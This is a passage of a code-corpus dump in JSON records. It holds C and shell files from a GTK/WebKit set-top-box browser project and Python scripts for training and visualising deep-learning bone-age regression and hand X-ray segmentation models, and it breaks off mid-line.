(g_vbox), GTK_WIDGET (create_browser ()), TRUE, TRUE, 0);\n gtk_box_pack_start (GTK_BOX (g_vbox), create_statusbar (), FALSE, FALSE, 0);\n \n g_window = create_window ();\n \n gtk_fixed_put(GTK_FIXED(fixed), g_vbox, 0, 0);\n gtk_widget_set_size_request(g_vbox, g_framebuffer_width, g_framebuffer_height);\n \n GtkWidget* statusLabel = gtk_label_new (\"Status\");\n gtk_fixed_put(GTK_FIXED(fixed), statusLabel, g_framebuffer_width - 200, 0);\n gtk_widget_set_size_request(statusLabel, 200, 100);\n \n gtk_container_add (GTK_CONTAINER (g_window), fixed);\n}\n\nvoid unloadEveBrowser()\n{\n gtk_main_quit();\n}\n\nint main (int argc, char* argv[]);\n\n\nvoid *GtkMain(void * argument)\n{\n printf(\"%s:%d\\n\", __func__, __LINE__);\n\n int argc = 0;\n char**argv = NULL;\n\n unsigned char haveUrl = 0;\n int argCount = 0;\n\n gtk_init (&argc, &argv);\n if (!g_thread_supported ())\n g_thread_init (NULL);\n\n GtkWidget* fixed = gtk_fixed_new();\n //screen_changed(fixed, NULL, NULL);\n g_vbox = gtk_vbox_new (FALSE, 0);\n gtk_box_pack_start (GTK_BOX (g_vbox), create_toolbar (), FALSE, FALSE, 0);\n gtk_box_pack_start (GTK_BOX (g_vbox), GTK_WIDGET (create_browser ()), TRUE, TRUE, 0);\n gtk_box_pack_start (GTK_BOX (g_vbox), create_statusbar (), FALSE, FALSE, 0);\n\n g_window = create_window ();\n\n gtk_fixed_put(GTK_FIXED(fixed), g_vbox, 0, 0);\n gtk_widget_set_size_request(g_vbox, g_framebuffer_width, g_framebuffer_height);\n\n GtkWidget* statusLabel = gtk_label_new (\"Status\");\n gtk_fixed_put(GTK_FIXED(fixed), statusLabel, g_framebuffer_width - 200, 0);\n gtk_widget_set_size_request(statusLabel, 200, 100);\n\n gtk_container_add (GTK_CONTAINER (g_window), fixed);\n\n webkit_web_view_load_uri (g_web_view, g_url);\n\n gtk_widget_grab_focus (GTK_WIDGET (g_web_view));\n gtk_widget_show_all (g_window);\n\n toogleMode();\n\n g_default_scale = g_framebuffer_width / 1280.0f;\n handleZoomLock(0);\n\n g_Callback(1);\n\n gtk_main ();\n return NULL;\n}\n\nvoid show()\n{\n\n\n pthread_create(&g_GtkMain, NULL, GtkMain, NULL);\n}\n\nvoid hide()\n{\n printf(\"%s:%d\\n\", __func__, __LINE__);\n gtk_widget_hide_all (g_window);\n}\n\n\n\n\n\nint\nmain (int argc, char* argv[])\n{\n pthread_create(&g_GtkMain, NULL, GtkMain, NULL);\n while(1);\n\n return 0;\n}\n#endif\n\n" }, { "alpha_fraction": 0.64213627576828, "alphanum_fraction": 0.6459209322929382, "avg_line_length": 28, "blob_id": "acc800503e3a6ce54b14c870577c96b70a995da9", "content_id": "d3c11090b8ec6feb24b1de19aa3cec99f8d5be5b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 2378, "license_type": "no_license", "max_line_length": 97, "num_lines": 82, "path": "/js_debug.c", "repo_name": "popazerty/eve-browser", "src_encoding": "UTF-8", "text": "#include <stdio.h>\n#include <stdlib.h>\n#include <sys/stat.h>\n#include <string.h>\n\n#include <JavaScriptCore/JavaScript.h>\n\nint JSValueToString(JSContextRef ctx, JSValueRef argument, JSValueRef *exception, char ** string)\n{\n JSType type = JSValueGetType(ctx, argument); \n if(type != kJSTypeString)\n return -1;\n\n JSStringRef s;\n s = JSValueToStringCopy(ctx, argument, exception);\n\n unsigned int len = JSStringGetLength(s);\n *string = (char * )malloc(len+1);\n JSStringGetUTF8CString(s, *string, len+1);\n\n JSStringRelease(s);\n return strlen(*string);\n}\n\n\nvoid printJSStringRef(JSStringRef string)\n{\n unsigned int len = JSStringGetLength(string);\n char * buffer = (char * )malloc(len+1);\n JSStringGetUTF8CString(string, buffer, len+1);\n printf(\"%s\\n\", buffer);\n free(buffer);\n}\n\nvoid printJSObjectRef(JSContextRef ctx, JSObjectRef argument)\n{\n\n JSPropertyNameArrayRef names = JSObjectCopyPropertyNames(ctx, argument);\n unsigned int propertySize = JSPropertyNameArrayGetCount(names);\n printf(\"%s > (propertySize=%d)\\n\", __func__, propertySize);\n for(unsigned int i = 0; i < propertySize; i++)\n {\n JSStringRef name = JSPropertyNameArrayGetNameAtIndex(names, i);\n printf(\"[%2d] \", i); printJSStringRef(name); printf(\"\\n\");\n }\n printf(\"%s < \\n\", __func__);\n}\n\nvoid printJSValueRef(JSContextRef ctx, JSValueRef argument, JSValueRef *exception)\n{\n printf(\"%s > \\n\", __func__);\n JSType type = JSValueGetType(ctx, argument);\n switch(type)\n {\n case kJSTypeUndefined: printf(\"kJSTypeUndefined\\n\"); break;\n case kJSTypeNull: printf(\"kJSTypeNull\\n\"); break;\n case kJSTypeBoolean: \n printf(\"kJSTypeBoolean\\n\"); \n printf(\"%s\\n\", JSValueToBoolean(ctx, argument)?\"True\":\"False\"); \n break;\n case kJSTypeNumber: \n printf(\"kJSTypeNumber\\n\"); \n printf(\"%f\\n\", JSValueToNumber(ctx, argument, exception)); \n break;\n\n case kJSTypeString: \n printf(\"kJSTypeString\\n\"); \n JSStringRef s;\n s = JSValueToStringCopy(ctx, argument, exception);\n printJSStringRef(s); \n JSStringRelease(s);\n break;\n\n case kJSTypeObject: \n printf(\"kJSTypeObject\\n\"); \n JSObjectRef o = JSValueToObject(ctx, argument, exception);\n printJSObjectRef(ctx, o); \n break;\n\n }\n printf(\"%s < \\n\", __func__);\n}\n" }, { "alpha_fraction": 0.678073525428772, "alphanum_fraction": 0.7224334478378296, "avg_line_length": 30.559999465942383, "blob_id": "29c0f823fb98587372bed75b2bdb859f7d0ba29b", "content_id": "da69738a391c42c2b0c17f10a641d66c949dd7f6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 789, "license_type": "no_license", "max_line_length": 70, "num_lines": 25, "path": "/start.sh", "repo_name": "popazerty/eve-browser", "src_encoding": "UTF-8", "text": "killall evremote2\nevremote2 -r /root/dfb/share/evremote2/ufs912_hbbtv.rc &\n\nexport LD_LIBRARY_PATH=/root/dfb/lib:$LD_LIBRARY_PATH\nln -s /root/dfb/share/directfb-1.4.3 /usr/share/directfb-1.4.3\n#ln -s /root/dfb/share/directfb-examples/ /usr/share/directfb-examples\nln -s /root/dfb/share/gtk-2.0/ /usr/share/gtk-2.0\nln -s /root/dfb/lib/directfb-1.4-0/ /usr/lib/directfb-1.4-0\nln -s /root/dfb/lib/gtk-2.0/ /usr/lib/gtk-2.0\nln -s /root/dfb/lib/pango/ /usr/lib/pango\n\nmkdir -p /etc/pango/\n#/root/dfb/bin/pango-querymodules > '/etc/pango/pango.modules'\ncp /root/dfb/share/pango/pango.modules /etc/pango/\ncp -r /root/dfb/share/gtk-2.0 /etc/\n\n\nexport DFBARGS=\"pixelformat=ARGB,no-cursor,bg-none\"\nexport GTK_IM_MODULE=multipress\n\n\nexec \"/root/dfb/bin/$1\" $2 $3 $4 $5\n\nkillall evremote2\nevremote2 &\n" } ]
13
ganaiemudasir05/bone-age-assessment
https://github.com/ganaiemudasir05/bone-age-assessment
a3a3581f560ace97b35e288b46f390ee1b2722f9
a89734e38c6576309ccfcf2d2be108b13274f6c3
0c32d56a1d8cca0b8734c0c15133791b08d21a4f
refs/heads/master
2023-03-16T06:53:50.486717
2018-11-28T11:36:06
2018-11-28T11:36:06
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6107441782951355, "alphanum_fraction": 0.6226332187652588, "avg_line_length": 37.49152374267578, "blob_id": "2f4e6ea8e8175bfde4d0224b4e8f3506492a08bd", "content_id": "2cc33dda65777c9b91e43b18ce69bc391192d310", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4542, "license_type": "no_license", "max_line_length": 122, "num_lines": 118, "path": "/vallina_transfer_learning/train.py", "repo_name": "ganaiemudasir05/bone-age-assessment", "src_encoding": "UTF-8", "text": "import keras\nimport os\nimport argparse\nimport pandas as pd\nimport numpy as np\nimport tensorflow as tf\n\nfrom keras.applications.xception import Xception\n\nfrom keras.layers import Dense, GlobalAveragePooling2D\nfrom keras.models import Model\nfrom keras import optimizers\nfrom pprint import pprint\nfrom tqdm import tqdm\n\nfrom config import *\nfrom utils import *\nfrom utils_metric import regression_metric\nfrom utils import _pprint\n\n\ndef _build_regressor(img_size=299, learning_rate=1E-4):\n input_shape = (img_size, img_size, 3)\n base_model = Xception(input_shape=input_shape, weights=\"imagenet\", include_top=False)\n\n x = base_model.output\n x = GlobalAveragePooling2D()(x)\n predictions = Dense(1, activation=keras.activations.relu)(x)\n model = Model(inputs=base_model.input, outputs=predictions)\n optimizer = optimizers.RMSprop(lr=learning_rate, decay=0.95)\n\n model.compile(optimizer=optimizer, loss=\"mean_squared_error\")\n model.summary(print_fn=_pprint)\n return model\n\n\ndef train(n_epoch, img_size=299, sex=0, batch_size=16, learning_rate=1E-4):\n assert sex in [0, 1, 2]\n model = _build_regressor(img_size, learning_rate)\n\n best_mae = np.inf\n\n data_ids = load_sex_ids(sex)\n\n for epoch in tqdm(range(n_epoch)):\n print \"[x] epoch {} -------------------------------------------\".format(epoch)\n for mini_batch in range(len(data_ids)//batch_size):\n batch_x, batch_y = load_data(sex=sex, img_size=img_size, batch_size=batch_size, augment_times=7)\n loss = model.train_on_batch(x=batch_x, y=batch_y)\n if mini_batch % 50 == 0:\n print \"--epoch {}, mini_batch {}, loss {}\".format(epoch, mini_batch, loss)\n\n # test\n print \"[x] test in epoch {}\".format(epoch)\n losses = 0.0\n for mini_batch in range(int(0.2*len(data_ids)//batch_size)):\n batch_x, batch_y = load_data(sex=sex, img_size=img_size, batch_size=batch_size, augment_times=0)\n loss = model.test_on_batch(batch_x, batch_y)\n losses += loss\n losses = losses/(int(0.3*len(data_ids)//batch_size))\n print \"== epoch {}, test loss {}\".format(epoch, losses)\n\n # test and metric\n print \"[x] predict in epoch {}\".format(epoch)\n y_true = []\n y_pred = []\n for mini_batch in range(int(0.2*len(data_ids)//batch_size)):\n batch_x, batch_y = load_data(sex=sex, img_size=img_size, batch_size=batch_size, augment_times=0)\n pred_y = model.predict_on_batch(batch_x)\n for i in range(batch_size):\n y_true.append(batch_y[i]*SCALE)\n y_pred.append(pred_y[i]*SCALE)\n\n evs, mae, mse, meae, r2s, ccc = regression_metric(np.array(y_true), np.array(y_pred))\n save_obj({\"evs\": evs, \"mae\": mae, \"mse\": mse, \"meae\": meae, \"r2s\": r2s, \"ccc\": ccc, \"loss\": losses},\n name=metric_out_dir+\"/epoch_{}.pkl\".format(epoch))\n\n if mae < best_mae:\n best_mae = mae\n model.save_weights(model_out_dir + \"/model.h5\")\n\n print \"[x] epoch {}, evs {}, mae {}, mse {}, meae {}, r2s {}, ccc {}\".format(epoch, evs, mae, mse, meae, r2s, ccc)\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument('--exp', type=str, help=\"experiment name\", default=\"regression\")\n parser.add_argument('--img_size', type=int, help=\"image size\", default=192)\n parser.add_argument('--batch_size', type=int, help=\"training batch size\", default=2)\n parser.add_argument('--sex', type=int, help=\"1 for male, 2 for female\", default=1)\n parser.add_argument('--gpu_id', type=int, help=\"number of GPU\", default=0)\n parser.add_argument('--epoch', type=int, default=200)\n FLAGS = parser.parse_args()\n\n pprint(FLAGS)\n\n exp_name = FLAGS.exp\n img_size = FLAGS.img_size\n batch_size = FLAGS.batch_size\n sex = FLAGS.sex\n gpu_id = FLAGS.gpu_id\n\n os.environ[\"CUDA_DEVICE_ORDER\"] = \"PCI_BUS_ID\"\n os.environ[\"CUDA_VISIBLE_DEVICES\"] = \"{}\".format(gpu_id)\n\n config = tf.ConfigProto()\n config.gpu_options.allow_growth = True\n set_session(tf.Session(config=config))\n\n metric_out_dir = \"E{}_S{}_IMG_{}/metric\".format(exp_name, sex, img_size)\n model_out_dir = \"E{}_S{}_IMG_{}/model\".format(exp_name, sex, img_size)\n if not os.path.isdir(metric_out_dir):\n os.makedirs(metric_out_dir)\n if not os.path.isdir(model_out_dir):\n os.makedirs(model_out_dir)\n\n # training\n train(n_epoch=FLAGS.epoch, img_size=img_size, sex=sex, batch_size=batch_size)\n" }, { "alpha_fraction": 0.6582733988761902, "alphanum_fraction": 0.6714628338813782, "avg_line_length": 41.11111068725586, "blob_id": "2936ff82c9df8331e9f185a07e3122d1555e00d9", "content_id": "3080788be990752b58e0940146e172f71a2225b2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4170, "license_type": "no_license", "max_line_length": 118, "num_lines": 99, "path": "/al_segmentation/step7_cam_visualize_all.py", "repo_name": "ganaiemudasir05/bone-age-assessment", "src_encoding": "UTF-8", "text": "import cv2\nimport argparse\nimport numpy as np\nimport os\nimport time\nimport matplotlib.pyplot as plt\nimport pandas as pd\n\nfrom keras.applications.inception_v3 import InceptionV3\nfrom keras.applications.inception_v3 import preprocess_input as inception_v3_input\n\nfrom keras.applications.inception_resnet_v2 import InceptionResNetV2\nfrom keras.applications.inception_resnet_v2 import preprocess_input as inception_resnet_input\nfrom keras.applications.xception import preprocess_input as xception_input\n\n\nfrom utils_data import load_obj\nfrom step4_regression_with_cam import _build_regresser\nfrom step6_cam import getCAM\nfrom config import RSNA_TRAIN_CSV, RSNA_SEG_ENHANCE\n\nfrom glob import glob\nfrom tqdm import tqdm\n\n\ndef load_img(data_id=None, img_size=256, preprocess_fn=xception_input):\n data_dir = RSNA_SEG_ENHANCE\n img_file_name = data_dir + \"/{}_seg.png\".format(data_id)\n img = cv2.imread(img_file_name, cv2.IMREAD_GRAYSCALE)\n img = cv2.resize(img, (img_size, img_size))\n ori_img = cv2.cvtColor(img, cv2.COLOR_GRAY2BGR)\n img = np.array(img, dtype=np.float32)\n img = preprocess_fn(img)\n img = cv2.cvtColor(img, cv2.COLOR_GRAY2BGR)\n int_image = np.array(ori_img, dtype=np.uint8)\n return img, int_image\n\n\ndef get_ba_by_id(img_id):\n dataset_df = pd.read_csv(RSNA_TRAIN_CSV)\n boneages = dataset_df[dataset_df.id==img_id].boneage\n boneage = boneages[boneages.index[0]]\n return boneage\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument('--batch_size', type=int, help=\"training batch size\", default=32)\n parser.add_argument('--model_name', type=str, help=\"model name: inception_v3 ....\", default=\"inception_v3\")\n parser.add_argument('--exp', type=str, help=\"experiment name\", default=\"cam\")\n parser.add_argument('--sex', type=int, help=\"0 for all, 1 for male, 2 for female\", default=1)\n parser.add_argument('--augment', type=str, help=\"augment data\", default=\"false\")\n parser.add_argument('--fine_tune', type=str, help=\"fine tune pretrained layer\", default=\"3\")\n parser.add_argument('--num_gpu', type=int, default=1)\n FLAGS = parser.parse_args()\n\n num_gpu = FLAGS.num_gpu\n batch_size = FLAGS.batch_size * num_gpu\n model_name = FLAGS.model_name\n exp_name = FLAGS.exp\n sex = FLAGS.sex\n augment_data = True if FLAGS.augment == \"true\" else False\n fine_tune = FLAGS.fine_tune\n\n metric_out_dir = \"E{}_M{}_S{}_A{}_F{}/metric\".format(exp_name, model_name, sex, augment_data, fine_tune)\n model_out_dir = \"E{}_M{}_S{}_A{}_F{}/model\".format(exp_name, model_name, sex, augment_data, fine_tune)\n cam_out_dir = \"E{}_M{}_S{}_A{}_F{}/cam_visualize_all\".format(exp_name, model_name, sex, augment_data, fine_tune)\n cam_out_dir2 = \"E{}_M{}_S{}_A{}_F{}/cam_visualize_all2\".format(exp_name, model_name, sex, augment_data, fine_tune)\n\n if not os.path.isdir(cam_out_dir):\n os.makedirs(cam_out_dir)\n if not os.path.isdir(cam_out_dir2):\n os.makedirs(cam_out_dir2)\n\n if model_name == \"inception_v3\":\n preprocess_fn = inception_v3_input\n elif model_name == \"inception_resnet_v2\":\n preprocess_fn = inception_resnet_input\n elif model_name == \"xception\":\n preprocess_fn = xception_input\n else:\n raise ValueError(\"Not a supported model name\")\n\n print \"[x] load saved model file\"\n weights_history = load_obj(model_out_dir + \"/weights_history.pkl\")\n model, input_shape, base_model = _build_regresser(model_name, weights=\"imagenet\", num_gpu=1, fine_tune=fine_tune)\n base_model.load_weights(filepath=model_out_dir + \"/base_model.h5\")\n\n imgs = glob(RSNA_SEG_ENHANCE+\"/*.*\")\n for img in tqdm(imgs):\n img_id = int(img[img.rfind(\"/\")+1:img.rfind(\"_\")])\n bone_age = get_ba_by_id(img_id)\n img, int_img = load_img(img_id, img_size=299, preprocess_fn=preprocess_fn)\n out = getCAM(image=int_img,\n feature_maps=base_model.predict(np.expand_dims(img, axis=0))[0],\n weights=weights_history[-1])\n\n cv2.imwrite(cam_out_dir+\"/{}_{}.png\".format(bone_age, img_id), out)\n cv2.imwrite(cam_out_dir2+\"/{}.png\".format(img_id), out)\n\n" }, { "alpha_fraction": 0.6272531747817993, "alphanum_fraction": 0.6437903046607971, "avg_line_length": 39.57718276977539, "blob_id": "2ea67957910057044295a35cc60425cc6aee3c49", "content_id": "918e82db6aeababfe31d60c9c1838909534f8d70", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6047, "license_type": "no_license", "max_line_length": 118, "num_lines": 149, "path": "/vallina_transfer_learning/train2.py", "repo_name": "ganaiemudasir05/bone-age-assessment", "src_encoding": "UTF-8", "text": "\nimport numpy as np\nimport pandas as pd\nimport os\nimport argparse\nimport pprint\nimport tensorflow as tf\n\nfrom glob import glob\nfrom tqdm import tqdm\nfrom config import *\nfrom utils_data_gen import build_data_generator\nfrom utils import save_obj, _pprint, LossHistory\n\n# import keras\nimport keras.backend as K\nfrom keras.applications.xception import Xception\nfrom keras.applications.inception_resnet_v2 import InceptionResNetV2\nfrom keras.applications.inception_v3 import InceptionV3\nfrom keras.layers import GlobalAveragePooling2D, Dense, Dropout\nfrom keras.models import Model\nfrom keras.backend.tensorflow_backend import set_session\nfrom keras.metrics import mean_absolute_error\nfrom keras import optimizers\n\n\n\nbone_age_std = 0\nbone_age_mean = 0\n\n\ndef ccc(y_true, y_pred):\n y_true = y_true * bone_age_std + bone_age_mean\n y_pred = y_pred * bone_age_std + bone_age_mean\n\n x_mean = K.mean(y_true, axis=-1)\n y_mean = K.mean(y_pred, axis=-1)\n return 2 * (y_true -x_mean) * (y_pred - y_mean) / \\\n (K.pow(y_true - x_mean, 2) + K.pow(y_pred - y_mean, 2) + K.pow(x_mean - y_mean, 2))\n\n\ndef mae_months(in_gt, in_pred):\n return mean_absolute_error(bone_age_std * in_gt, bone_age_std * in_pred)\n\n\ndef build_model(flags, model_file):\n if flags.model_name == \"inception_v3\":\n base_model = InceptionV3(input_shape=(flags.image_size, flags.image_size, 3), include_top=False,\n weights='imagenet')\n elif flags.model_name == \"inception_resnet_v2\":\n base_model = InceptionResNetV2(input_shape=(flags.image_size, flags.image_size, 3), include_top=False,\n weights='imagenet')\n elif flags.model_name == \"xception\":\n base_model = Xception(input_shape=(flags.image_size, flags.image_size, 3), include_top=False,\n weights='imagenet')\n else:\n raise NotImplementedError(\"Not a supported model: {}\".format(flags.model_name))\n\n x = base_model.output\n x = GlobalAveragePooling2D()(x)\n x = Dropout(0.5)(x)\n x = Dense(1024, activation='tanh')(x)\n x = Dropout(0.25)(x)\n x = Dense(1, activation='linear')(x)\n\n model = Model(inputs=base_model.input, outputs=x)\n\n if os.path.isfile(model_file):\n print \"[x] loading model file {}\".format(model_file)\n model.load_weights(model_file)\n\n optimizer = optimizers.Adam(lr=0.0001)\n model.compile(optimizer=optimizer, loss='mse', metrics=[mae_months, ccc])\n\n model.summary(print_fn=_pprint)\n return model\n\n\ndef build_callbacks(model_file_path):\n from keras.callbacks import ModelCheckpoint, EarlyStopping, ReduceLROnPlateau\n checkpoint = ModelCheckpoint(model_file_path, monitor='val_loss', verbose=1,\n save_best_only=True, mode='min', save_weights_only=True)\n reduceLROnPlat = ReduceLROnPlateau(monitor='val_loss', factor=0.8, patience=10, verbose=1, mode='auto',\n epsilon=0.0001, cooldown=5, min_lr=0.000001)\n early = EarlyStopping(monitor=\"val_loss\", mode=\"min\", patience=5)\n loss_callback = LossHistory()\n callbacks_list = [checkpoint, early, reduceLROnPlat, loss_callback]\n return callbacks_list\n\n\ndef train(flags, output_path):\n print \"[x] loading data\"\n train_gen, valid_gen, bone_mean, bone_std, test_X, test_Y = \\\n build_data_generator(model_name=flags.model_name, sex=flags.sex, img_path=flags.image_path,\n num_per_category=flags.n_samples, img_size=flags.image_size, batch_size=flags.batch_size)\n global bone_age_std\n bone_age_std = bone_std\n global bone_age_mean\n bone_age_mean = bone_mean\n\n print \"[x] building model\"\n bone_age_model = build_model(flags, model_file=output_path + \"/weights.h5\")\n print \"[x] building callbacks\"\n callbacks = build_callbacks(output_path + \"/weights.h5\")\n print \"[x] fit\"\n\n hist = bone_age_model.fit_generator(train_gen,\n validation_data=(test_X, test_Y),\n epochs=flags.n_epochs,\n callbacks=callbacks,\n workers=4,\n steps_per_epoch=5000)\n save_obj(hist.history, output_path + \"/{}_history.pkl\".format(flags.fine_tune))\n\n\nif __name__ == \"__main__\":\n # python step1_fine_tune.py --batch_size=16 --model_name=inception_v3 --exp=ENH --sex=1 --fine_tune=-1\n # --gpu_id=0 --image_path=../data/segmented_enhance --image_size=384 --n_epoch=500 --n_samples=500\n\n parser = argparse.ArgumentParser()\n parser.add_argument('--batch_size', type=int, help=\"training batch size\", default=4)\n parser.add_argument('--model_name', type=str, help=\"model name: inception_v3 ....\", default=\"inception_v3\")\n parser.add_argument('--exp', type=str, help=\"experiment name\", default=\"ENH\")\n parser.add_argument('--sex', type=int, help=\"0 for all, 1 for male, 2 for female\", default=2)\n parser.add_argument('--fine_tune', type=int, help=\"fine tune pretrained layer\", default=0)\n parser.add_argument('--gpu_id', type=int, default=0)\n parser.add_argument('--image_path', type=str, default=RSNA_TRAIN_DATA)\n parser.add_argument('--image_size', type=int, default=256)\n parser.add_argument('--n_epochs', type=int, default=500)\n parser.add_argument('--n_samples', type=int, default=500)\n FLAGS = parser.parse_args()\n\n pprint.pprint(FLAGS)\n\n print \"[x] building models on GPU {}\".format(FLAGS.gpu_id)\n\n os.environ[\"CUDA_DEVICE_ORDER\"] = \"PCI_BUS_ID\"\n os.environ[\"CUDA_VISIBLE_DEVICES\"] = \"{}\".format(FLAGS.gpu_id)\n\n config = tf.ConfigProto()\n # config.gpu_options.allow_growth = True\n config.gpu_options.per_process_gpu_memory_fraction = 0.95\n set_session(tf.Session(config=config))\n\n output_path = \"E{}_M{}_S{}_I{}\".format(FLAGS.exp, FLAGS.model_name, FLAGS.sex, FLAGS.image_size)\n\n if not os.path.isdir(output_path):\n os.makedirs(output_path)\n\n train(FLAGS, output_path)\n" }, { "alpha_fraction": 0.6445947289466858, "alphanum_fraction": 0.6624608635902405, "avg_line_length": 46.63461685180664, "blob_id": "8f496c5eb790b6772b3ed2297347f393cd2badaf", "content_id": "ad41820af4e47d5a9d80a7304c0c0b1abf410e3b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 9907, "license_type": "no_license", "max_line_length": 130, "num_lines": 208, "path": "/al_segmentation/step3_gen_segmentation_result.py", "repo_name": "ganaiemudasir05/bone-age-assessment", "src_encoding": "UTF-8", "text": "import tensorflow as tf\nimport numpy as np\nimport argparse\nimport matplotlib.pyplot as plt\nimport os\nimport cv2\n\nfrom tqdm import tqdm\nfrom glob import glob\n\nimport utils_data\n\nfrom tf_model_unet import unet\nfrom tf_ops import dice_coef_loss, pixelwise_cross_entropy\nfrom config import *\nfrom utils_metrics import threshold_by_otsu\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--batch_size', type=int, help=\"training batch size\", default=4)\nparser.add_argument('--dice', type=float, help=\"dice coefficient loss ratio\", default=1.0)\nparser.add_argument('--pixel', type=float, help=\"pixelwise cross entropy loss ratio\", default=1.0)\nparser.add_argument('--gpu', type=int, help=\"GPU number\", default=0)\nparser.add_argument('--exp', type=str, help=\"experiment name\", default=\"interactive_segmentation\")\nFLAGS = parser.parse_args()\n\nbatch_size = FLAGS.batch_size\ndice_ratio = FLAGS.dice\npixel_ratio = FLAGS.pixel\ngpu = FLAGS.gpu\n\nexperiment_name = \"{}_dice{}_pixel{}_GPU{}\".format(FLAGS.exp, dice_ratio, pixel_ratio, gpu)\nimg_out_dir = \"{}/segmentation_results\".format(experiment_name)\nmodel_out_dir = \"{}/model\".format(experiment_name)\nmetrics_out_dir = \"{}/metrics\".format(experiment_name)\ninference_dir = \"{}/inferenced_result\".format(experiment_name)\nsegmented_all = \"{}/segmented_all\".format(experiment_name)\nif not os.path.isdir(inference_dir):\n os.makedirs(inference_dir)\nif not os.path.isdir(segmented_all):\n os.makedirs(segmented_all)\n\n\nprint \"[x] building models on GPU: {}\".format(gpu)\nos.environ[\"CUDA_DEVICE_ORDER\"] = \"PCI_BUS_ID\"\nos.environ[\"CUDA_VISIBLE_DEVICES\"] = \"{}\".format(gpu)\nconfig = tf.ConfigProto()\nconfig.gpu_options.allow_growth = True\nsess = tf.Session(config=config)\n\n\n# create model 0\nis_train = tf.placeholder(tf.bool)\nprint \"[x] building Model 0\"\ntf.set_random_seed(1377)\nx_0 = tf.placeholder(tf.float32, [batch_size, IMAGE_SIZE, IMAGE_SIZE, 1], name=\"x_0\")\ny_0 = tf.placeholder(tf.float32, [batch_size, IMAGE_SIZE, IMAGE_SIZE, 1], name=\"y_0\")\ny_prob0, conv9_feature0 = unet(x_0, is_train, n_filters=32, name=\"u-net_0\")\ndice_coef_loss_0 = dice_coef_loss(y_prob0, y_0)\npixelwise_cross_entropy_0 = pixelwise_cross_entropy(y_prob0, y_0)\nloss_0 = dice_ratio * dice_coef_loss_0 + pixel_ratio * pixelwise_cross_entropy_0\n\nprint \"[x] building Model 1\"\ntf.set_random_seed(7988)\nx_1 = tf.placeholder(tf.float32, [batch_size, IMAGE_SIZE, IMAGE_SIZE, 1], name=\"x_1\")\ny_1 = tf.placeholder(tf.float32, [batch_size, IMAGE_SIZE, IMAGE_SIZE, 1], name=\"y_1\")\ny_prob1, conv9_feature1 = unet(x_1, is_train, n_filters=32, name=\"u-net_1\")\ndice_coef_loss_1 = dice_coef_loss(y_prob1, y_1)\npixelwise_cross_entropy_1 = pixelwise_cross_entropy(y_prob1, y_1)\nloss_1 = dice_ratio * dice_coef_loss_1 + pixel_ratio * pixelwise_cross_entropy_1\n\n\nprint \"[x] restore model ...\"\nsaver = tf.train.Saver()\nmodel_file = tf.train.latest_checkpoint(model_out_dir)\nsaver.restore(sess, model_file)\n\nprint \"[x] loading data ...\"\nannotated_ids = utils_data.load_annotated_data_np(data_dir=RSNA_GT_NP_ANNOTATED, return_ids=True)\nprint \"[x] load annotated data ...\"\nannotated_x, annotated_y, annotated_ids = utils_data.load_annotated_data_np(data_dir=RSNA_GT_NP_ANNOTATED, return_ids=False)\nprint \"[x] load unannotated data ...\"\nunannotated_x, unannotated_ids = utils_data.load_unannotated_data_np(data_dir=RSNA_GT_NP_UNANNOTATED, annotated_ids=annotated_ids)\nprint \"[x] loaded annotated data: {}, unannotated data: {}\".format(annotated_x.shape[0], unannotated_x.shape[0])\n\n# Segment unannotated data\ndef segment_unannotated_image(sess, input_tensor, output_tensor, is_training, image_data):\n images = []\n for k in range(batch_size):\n images.append(image_data)\n images = np.array(images, dtype=np.float32)\n [segmentation] = sess.run([output_tensor], feed_dict={input_tensor: images, is_training: False})\n return np.squeeze(segmentation[0], axis=2)\n\n\ndef resize_to_ori(image_data, image_data_id, data_dir=RSNA_DATA_DIR):\n img_ori = cv2.imread(data_dir+\"/{}.png\".format(image_data_id), cv2.IMREAD_GRAYSCALE)\n if img_ori.shape[0] > img_ori.shape[1]:\n pad = (img_ori.shape[0] - img_ori.shape[1]) // 2\n pad_tuple = ((0, 0), (pad, pad))\n else:\n pad = (img_ori.shape[1] - img_ori.shape[0]) // 2\n pad_tuple = ((pad, pad), (0, 0))\n padded = np.pad(img_ori, pad_tuple, mode=\"constant\")\n resized_img = cv2.resize(image_data, (padded.shape[1], padded.shape[0]), interpolation=cv2.INTER_AREA)\n return resized_img, padded\n\n\ndef crop_hand_bin(img_bin):\n try:\n smooth_w, smooth_h = img_bin.shape[0]//30, img_bin.shape[1]//30\n min_row = np.min(np.where(img_bin==1)[0])\n max_row = np.max(np.where(img_bin==1)[0])\n min_col = np.min(np.where(img_bin==1)[1])\n max_col = np.max(np.where(img_bin==1)[1])\n min_row = np.clip(min_row-smooth_w, 0, min_row)\n max_row = np.clip(max_row+smooth_w, max_row, img_bin.shape[0]-1)\n min_col = np.clip(min_col-smooth_h, 0, min_col)\n max_col = np.clip(max_col+smooth_h, max_col, img_bin.shape[1]-1)\n return min_row, max_row, min_col, max_col\n except:\n print \"expection happened\"\n return 0, img_bin.shape[0], 0, img_bin.shape[1]\n\n\ndef pad_img_2_rect(img):\n if img.shape[0] > img.shape[1]:\n pad = (img.shape[0] - img.shape[1]) // 2\n pad_tuple = ((0, 0), (pad, pad))\n else:\n pad = (img.shape[1] - img.shape[0]) // 2\n pad_tuple = ((pad, pad), (0, 0))\n padded = np.pad(img, pad_tuple, mode=\"constant\")\n return padded\n\n# inference with model 0\nfor i in range(unannotated_x.shape[0]):\n image_id = unannotated_ids[i]\n print \"inference {}\".format(image_id)\n segmentated_data_0 = segment_unannotated_image(sess, x_0, y_prob0, is_train, unannotated_x[i])\n resized_segmentated_data_0, padded_ori_img = resize_to_ori(segmentated_data_0, image_id, data_dir=RSNA_DATA_DIR)\n img_seg_0 = np.multiply(resized_segmentated_data_0, padded_ori_img)\n plt.imsave(fname=inference_dir+\"/{}_x.png\".format(image_id), arr=np.squeeze(unannotated_x[i], axis=2), 